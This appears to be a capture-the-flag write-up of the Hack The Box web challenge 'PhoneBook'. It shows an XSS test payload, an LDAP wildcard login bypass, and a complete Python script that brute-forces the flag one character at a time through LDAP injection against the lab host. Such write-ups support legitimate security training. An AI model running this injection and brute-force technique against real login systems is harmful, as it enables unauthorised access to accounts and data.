PhoneBook [ web challenge — Hack The Box]

CHALLENGE DESCRIPTION

Who is lucky enough to be included in the phonebook?

Host : 68.183.45.211:30930

On Hack The Box today, I completed a web challenge. The login credential will be brute-forced via LDAP Injection. So Let’s start.

Scanning :

When I looked up the IP address, I discovered a website with a login page. I tried a standard login credential, but it failed and displayed the warning “Authentication Failed.” I see that “reese” is a user, so I attempt a different password credential with “reese” as the user name, but I am unable to login.

After that, I tested the xss on the url “login?message=script>alert(1);/script>.” Its influence is negligible. When I tested a different payload, an XSS pop up appeared. However, despite numerous attempts, I was unable to locate the meaning result. I looked into different options for getting around the login credentials.

With the username “Reese” and a “alphanumeric character*” in the password field, I was able to get in to the application. and redirect the another page.

Exploit :

I write a python script to bruteforce the password credential.

import requests
import string

headers = {“UserAgent” : “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0”}
url = “http://68.183.45.211:30930/login"

chars = string.ascii_letters
chars += ‘’.join([‘0’, ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’, ‘8’, ‘9’, ‘`’, ‘~’, ‘!’, ‘@’, ‘$’, ‘%’, ‘&’, ‘-’, ‘_’, “‘“])

counter = 0
flag = “HTB{“

while True:
# if all chars are not correct means we previous already found the flag
if counter == len(chars):
print(flag + “}”)
break

# creates something like HTB{a*}
password = flag + chars[counter] + “*}”
print(“Trying: “ + password)

data = {“username” : “Reese”, “password” : password}
response = requests.post(url, headers=headers, data=data)

if (response.url != url + “?message=Authentication%20failed”):
# possible flag since we still using * at the end: e.g HTB{abc_*}.
# append chars[] so that we not need to deal with removing “*}” as compared to if we assign password variable to flag variable
flag += chars[counter]
counter = 0
else:
# increment the char since we might not have found the right letter
counter += 1

It takes to some to brute force and found the flag

Thank You